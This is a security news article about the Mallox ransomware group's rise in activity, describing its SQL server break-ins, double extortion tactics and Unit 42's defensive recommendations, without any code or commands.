A ransomware actor with a penchant for breaking into target networks via vulnerable SQL servers has suddenly become very active over the past several months and appears poised to become an even bigger threat than it is already.
The group, tracked as Mallox — aka TargetCompany, Fargo, and Tohnichi — first surfaced in June 2021 and claims to have infected hundreds of organizations worldwide since then. The group’s victims include organizations in the manufacturing, retail, wholesale, legal, and professional services sectors.
Sudden Surge
Starting earlier this year, threat activity related to the group has surged, particularly in May, according to researchers at Palo Alto Networks’ Unit 42 threat intelligence team. Palo Alto’s telemetry, and that from other open threat intelligence sources, show a startling 174% increase in Mallox-related activity so far this year, compared to 2022, the security vendor said in a blog this week.
Previously, Mallox was known for being a relatively small and closed ransomware group, says Lior Rochberger, senior security researcher at Palo Alto Networks, attributes the explosive activity to concerted efforts by group leaders to grow Mallox operations.
“In the beginning of 2023, it appears that the group started putting more efforts into expanding its operations by recruiting affiliates,” she says. “This can potentially explain the surge we observed during this year, and especially more recently, around May.”
The Mallox group’s typical approach for gaining initial access on enterprise networks is to target vulnerable and otherwise insecure SQL servers. Often they start with a brute-force attack where the adversary uses a list of commonly used passwords or known default passwords against an organization’s SQL servers.
Targeting Insecure SQL Servers
Researchers have observed Mallox exploiting at least two remote code execution vulnerabilities in SQL — CVE-2020-0618 and CVE-2019-1068, Rochberger says.
So far, Unit 42 has only observed Mallox infiltrating networks via SQL servers. But other researchers have reported recent attempts to distribute Mallox via phishing emails, suggesting that new affiliate groups are involved now as well, Rochberger says.
“After gaining access, the attackers use the command line and PowerShell to download the Mallox ransomware payload from a remote server,” Unit 42’s report this week noted.
As with many other ransomware infections these days, the payload first attempts to disable all services that would impede its ability to encrypt data on a victim system. It also tries to systematically delete shadow copies, so data restoration becomes harder once encryption is complete. In addition, the malware tries to clear all event logs using a common Microsoft command utility as part of an effort to complicate forensics analysis.
Mallox is a double extortion campaign, meaning the threat actors steal data from a victim environment before encrypting it. The group — like almost every other ransomware operation these days — maintains a website where it leaks data belonging to victims who refuse to accede to its ransom demands. Victim organizations can negotiate with Mallox operators via a Tor website using a unique private key to authenticate themselves. Mallox operators themselves claim to have breached hundreds of organizations worldwide. Unit 42 said its own telemetry indicates at least dozens of potential victims worldwide.
Mallox’s sudden burst of activity, while noteworthy, is unlikely to change anything for enterprise defenders or cause any new additional problems for them. A new report from the NCC Group this week showed a 221% increase in ransomware attacks this year over the same period in 2022. NCC Group said it counted a record 434 attacks in June 2023, most of them tied to the Cl0p ransomware group’s exploitation of the MOVEit file transfer vulnerability. The Cl0p group in total accounted for 90 ransomware attacks that NCC observed in June. Lockbit 3.0 was another very active threat actor over the period, NCC Group said.
As always, the best defense against the threat is to have a multilayered plan in place for addressing such attacks. “The Unit 42 team recommends making sure that all Internet-facing applications are configured properly, and all systems are patched and up to date wherever possible,” the security vendor advised. It’s also a good idea to have endpoint security controls in place for performing in-memory inspection to detect process-injection attempts, lateral movement efforts, and attempts to evade security controls, the vendor said.